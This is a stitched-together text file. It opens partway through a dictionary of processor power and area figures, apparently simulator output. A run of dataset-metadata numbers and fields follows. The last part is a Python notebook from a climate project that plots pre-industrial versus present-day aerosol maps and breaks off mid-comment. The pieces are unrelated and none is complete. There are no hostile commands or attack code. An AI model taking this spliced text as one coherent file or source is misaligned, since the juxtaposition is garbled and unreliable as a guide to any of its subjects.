'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00179656,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.00448462,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0589979,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0272974,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 1.73635,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.0533935,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.0927142,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 4.03913,
'Instruction Fetch Unit/Runtime Dynamic': 0.179686,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932286,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.40843,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0339711,
'L2/Runtime Dynamic': 0.00801619,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80901,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 2.30253,
'Load Store Unit/Data Cache/Runtime Dynamic': 0.523658,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0350888,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.0344687,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.0344686,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 2.4653,
'Load Store Unit/Runtime Dynamic': 0.728114,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.0849939,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.169987,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591321,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283293,
'Memory Management Unit/Area': 0.4339,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.0301646,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.0306742,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00808595,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.10796,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.00875462,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.315886,
'Memory Management Unit/Runtime Dynamic': 0.0394289,
'Memory Management Unit/Subthreshold Leakage': 0.0766103,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0398333,
'Peak Dynamic': 14.4714,
'Renaming Unit/Area': 0.303608,
'Renaming Unit/FP Front End RAT/Area': 0.131045,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00351123,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 2.51468,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.0,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0308571,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.0175885,
'Renaming Unit/Free List/Area': 0.0340654,
'Renaming Unit/Free List/Gate Leakage': 2.5481e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0306032,
'Renaming Unit/Free List/Runtime Dynamic': 0.00412994,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000370144,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000201064,
'Renaming Unit/Gate Leakage': 0.00708398,
'Renaming Unit/Int Front End RAT/Area': 0.0941223,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.000283242,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.731965,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.0482172,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00435488,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00248228,
'Renaming Unit/Peak Dynamic': 3.58947,
'Renaming Unit/Runtime Dynamic': 0.0523471,
'Renaming Unit/Subthreshold Leakage': 0.0552466,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0276461,
'Runtime Dynamic': 2.13212,
'Subthreshold Leakage': 6.16288,
'Subthreshold Leakage with power gating': 2.55328},
{'Area': 32.0201,
'Execution Unit/Area': 7.68434,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.0359823,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.230951,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.185846,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.120359,
'Execution Unit/Instruction Scheduler/Area': 1.66526,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.275653,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.000977433,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.04181,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.090582,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.0143453,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00810519,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00568913,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 0.805223,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00414562,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 1.6763,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.146105,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0625755,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0355964,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 3.82262,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.584388,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.00056608,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.10451,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.0737491,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.00906853,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00364446,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 0.310436,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.0859892,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.047346,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.0751058,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 4.30202,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.0351104,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.00379941,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.0412899,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.028099,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.0764002,
'Execution Unit/Register Files/Runtime Dynamic': 0.0318984,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0390912,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00537402,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.0959837,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.255689,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.081478,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0305543,
'Execution Unit/Runtime Dynamic': 1.23435,
'Execution Unit/Subthreshold Leakage': 1.79543,
'Execution Unit/Subthreshold Leakage with power gating': 0.688821,
'Gate Leakage': 0.368936,
'Instruction Fetch Unit/Area': 5.85939,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.000261998,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.000261998,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.000228631,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 8.87431e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.000403644,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00115627,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.00249658,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0589979,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0270123,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 1.71821,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.0739899,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.0917459,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 4.02012,
'Instruction Fetch Unit/Runtime Dynamic': 0.196401,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932286,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.40843,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.059667,
'L2/Runtime Dynamic': 0.016704,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80901,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 2.31803,
'Load Store Unit/Data Cache/Runtime Dynamic': 0.547845,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0350888,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.0349699,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.0349699,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 2.48316,
'Load Store Unit/Runtime Dynamic': 0.755275,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.0862298,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.17246,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591321,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283293,
'Memory Management Unit/Area': 0.4339,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.0306032,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.0314874,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00808595,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.106832,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0121653,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.315512,
'Memory Management Unit/Runtime Dynamic': 0.0436527,
'Memory Management Unit/Subthreshold Leakage': 0.0766103,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0398333,
'Peak Dynamic': 14.7699,
'Renaming Unit/Area': 0.303608,
'Renaming Unit/FP Front End RAT/Area': 0.131045,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00351123,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 2.51468,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.0923598,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0308571,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.0175885,
'Renaming Unit/Free List/Area': 0.0340654,
'Renaming Unit/Free List/Gate Leakage': 2.5481e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0306032,
'Renaming Unit/Free List/Runtime Dynamic': 0.00521081,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000370144,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000201064,
'Renaming Unit/Gate Leakage': 0.00708398,
'Renaming Unit/Int Front End RAT/Area': 0.0941223,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.000283242,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.731965,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.0448046,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00435488,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00248228,
'Renaming Unit/Peak Dynamic': 3.58947,
'Renaming Unit/Runtime Dynamic': 0.142375,
'Renaming Unit/Subthreshold Leakage': 0.0552466,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0276461,
'Runtime Dynamic': 2.38876,
'Subthreshold Leakage': 6.16288,
'Subthreshold Leakage with power gating': 2.55328}],
'DRAM': {'Area': 0,
'Gate Leakage': 0,
'Peak Dynamic': 5.813424232297078,
'Runtime Dynamic': 5.813424232297078,
'Subthreshold Leakage': 4.252,
'Subthreshold Leakage with power gating': 4.252},
'L3': [{'Area': 61.9075,
'Gate Leakage': 0.0484137,
'Peak Dynamic': 0.29799,
'Runtime Dynamic': 0.0870334,
'Subthreshold Leakage': 6.80085,
'Subthreshold Leakage with power gating': 3.32364}],
'Processor': {'Area': 191.908,
'Gate Leakage': 1.53485,
'Peak Dynamic': 68.6417,
'Peak Power': 101.754,
'Runtime Dynamic': 12.9273,
'Subthreshold Leakage': 31.5774,
'Subthreshold Leakage with power gating': 13.9484,
'Total Cores/Area': 128.669,
'Total Cores/Gate Leakage': 1.4798,
'Total Cores/Peak Dynamic': 68.3437,
'Total Cores/Runtime Dynamic': 12.8403,
'Total Cores/Subthreshold Leakage': 24.7074,
'Total Cores/Subthreshold Leakage with power gating': 10.2429,
'Total L3s/Area': 61.9075,
'Total L3s/Gate Leakage': 0.0484137,
'Total L3s/Peak Dynamic': 0.29799,
'Total L3s/Runtime Dynamic': 0.0870334,
'Total L3s/Subthreshold Leakage': 6.80085,
'Total L3s/Subthreshold Leakage with power gating': 3.32364,
'Total Leakage': 33.1122,
'Total NoCs/Area': 1.33155,
'Total NoCs/Gate Leakage': 0.00662954,
'Total NoCs/Peak Dynamic': 0.0,
'Total NoCs/Runtime Dynamic': 0.0,
'Total NoCs/Subthreshold Leakage': 0.0691322,
'Total NoCs/Subthreshold Leakage with power gating': 0.0259246}}
| 75.09081
| 124
| 0.682121
| 8,087
| 68,633
| 5.783109
| 0.067145
| 0.123503
| 0.112898
| 0.093397
| 0.939018
| 0.93115
| 0.9177
| 0.887744
| 0.861829
| 0.842007
| 0
| 0.132151
| 0.224251
| 68,633
| 914
| 125
| 75.09081
| 0.746253
| 0
| 0
| 0.642232
| 0
| 0
| 0.657182
| 0.048081
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
bc0295a5817b841da88a007d236cedc49012cd5b
| 34,984
|
py
|
Python
|
oas_erf/notebooks/01_maps/PD_PI/02_maps_abs_diff_diff.py
|
sarambl/OAS-ERF
|
7510c21a630748eda2961608166227ad77935a67
|
[
"MIT"
] | null | null | null |
oas_erf/notebooks/01_maps/PD_PI/02_maps_abs_diff_diff.py
|
sarambl/OAS-ERF
|
7510c21a630748eda2961608166227ad77935a67
|
[
"MIT"
] | null | null | null |
oas_erf/notebooks/01_maps/PD_PI/02_maps_abs_diff_diff.py
|
sarambl/OAS-ERF
|
7510c21a630748eda2961608166227ad77935a67
|
[
"MIT"
] | null | null | null |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: percent
# format_version: '1.3'
# jupytext_version: 1.3.2
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# %% [markdown]
# ## Plot abs, diff, diff for PI and PD
#
#
# %%
# load and autoreload
from IPython import get_ipython
from IPython.display import clear_output
from matplotlib import colors
from useful_scit.imps import (plt)
from oas_erf.data_info.simulation_types import get_abs_by_type
from oas_erf.constants import get_plotpath
from oas_erf.data_info.simulation_types import get_casen_by_type_mod
from oas_erf.util.imports import get_averaged_fields
from oas_erf.util.practical_functions import make_folders
from oas_erf.util.slice_average.significance import load_and_plot_sign
# Enable IPython autoreload so edited project modules are re-imported live.
# noinspection PyBroadException
try:
    _ipython = get_ipython()
    _magic = _ipython.magic
    _magic('load_ext autoreload')
    _magic('autoreload 2')
except (ImportError, AttributeError):
    # Fix: outside IPython, get_ipython() returns None, so `.magic` raises
    # AttributeError (ImportError alone could never trigger here since the
    # import already succeeded above). Fall back silently to plain-script mode.
    pass
from oas_erf.util.plot.maps_PIPD import abs_diffs_PI_PD_sep
# %%
import cartopy.crs as ccrs
# %% [markdown]
# ### Div settings:
# %%
p_level = 1013.  # single pressure level [hPa] used when avg_over_lev is False
pmin = 850.  # minimum pressure level [hPa] for the level average
avg_over_lev = True  # average over levels (pmin..surface) rather than plot one level
pressure_adjust = True  # Can only be false if avg_over_lev false. Plots particular hybrid sigma lev
p_levels = [1013., 900., 800., 700., 600.]  # used if not avg
# %%
# Model and simulation period (model years) to average over:
model = 'NorESM'
startyear = '0004-01'
endyear = '0008-12'
# %%
# Sectional-scheme (SECT) cases: PI control and PD-aerosol run:
cases_sec = [
    'NF1850_SECT_ctrl',
    'NF1850_aeroxid2014_SECT_ctrl'
]
# Non-sectional (original scheme) cases: default and 'ox_ricc' variants,
# each for PI and PD aerosol:
cases_orig = [
    'NF1850_noSECT_def',
    'NF1850_aeroxid2014_noSECT_def',
    'NF1850_aeroxid2014_noSECT_ox_ricc',
    'NF1850_noSECT_ox_ricc'
]
cases = cases_orig + cases_sec
# %% [markdown]
# ### For output names:
# %%
# Version tag used in every output filename under the 'maps' plot directory.
version = 'pi_pd_diff'
plot_path = get_plotpath('maps')
filen_base = plot_path + '/%s' % version
# print(plot_path)
make_folders(plot_path)
# %%
print(filen_base)
# %% [markdown]
# ### Variables to load:
# %%
# Fields to load for every case: mode number concentrations/radii, cloud
# droplet diagnostics and the '_Ghan' forcing diagnostics.
# Fix: 'NMR01' and 'NCONC01' were listed twice in the original; the
# duplicates are removed (same set of variables is loaded).
varl = ['NCONC01', 'NMR01', 'N_AER', 'NCONC08', 'NCONC09', 'NMR08', 'NMR09', 'ACTNL_incld',
        'ACTREL_incld', 'CDNUMC', 'cb_NA', 'cb_SOA_NA', 'cb_SO4_NA', 'AWNC_incld', 'AREL_incld',
        'TGCLDLWP', 'DIR_Ghan', 'SWCF_Ghan', 'LWCF_Ghan', 'NCFT_Ghan', 'N50', 'N100',
        'N250', 'N150', 'N200', 'SIGMA01']
subfig_size = 2.9  # size of each map panel (inches)
asp_ratio = .9  # panel aspect ratio
print(varl)
# %%
# Load time-averaged lat/lon fields for all cases over the analysis period.
case_dic = get_averaged_fields.get_maps_cases(cases,
                                              varl,
                                              startyear,
                                              endyear,
                                              avg_over_lev=avg_over_lev,
                                              pmin=pmin,
                                              pressure_adjust=pressure_adjust,
                                              p_level=p_level,
                                              )
# %% [markdown]
# ## Calculate various variables:
# %%
# Derived field: NCONC01 as a percentage of the total aerosol number N_AER
# (labelled 'NPF_frac' — presumably the new-particle-formation fraction;
# confirm against the model's mode definitions).
for case in cases:
    _ds = case_dic[case]
    _ds['NPF_frac'] = _ds['NCONC01'] / _ds['N_AER'] * 100
    _ds['NPF_frac'].attrs['units'] = '%'
if 'NPF_frac' not in varl:
    varl.append('NPF_frac')
# %% [markdown]
# ### Organize data in easy to use format:
# %%
# Group the per-case datasets by case type (PI / PIaerPD) and model variant.
relative = False
dic_abs = get_abs_by_type(case_dic,
                          case_types=['PI', 'PIaerPD'],
                          mod_types=None)
# %% [markdown]
# ## Plots:
# %%
# First figure: NPF_frac absolute maps and model differences, with PI and
# present-day columns shown separately.
var = 'NPF_frac'
relative = False
fig, axs_dic = abs_diffs_PI_PD_sep(dic_abs,
                                   var,
                                   relative=relative,
                                   # , 'ACTNL_incld', 'ACTREL_incld'],
                                   # norm_abs=norm_abs,
                                   # norm_dic=norm_dic
                                   type_nndic={'PI': 'Pre-industrial', 'PIaerPD': 'Present day'}
                                   )
fig.savefig(filen_base + f'{var}_PIPD_sep_rel{relative}.pdf', dpi=300)
plt.show()
# %% [markdown]
# ## Settings for colorbars:
# %%
# Colorbar norms for absolute-difference panels: symlog for fields spanning
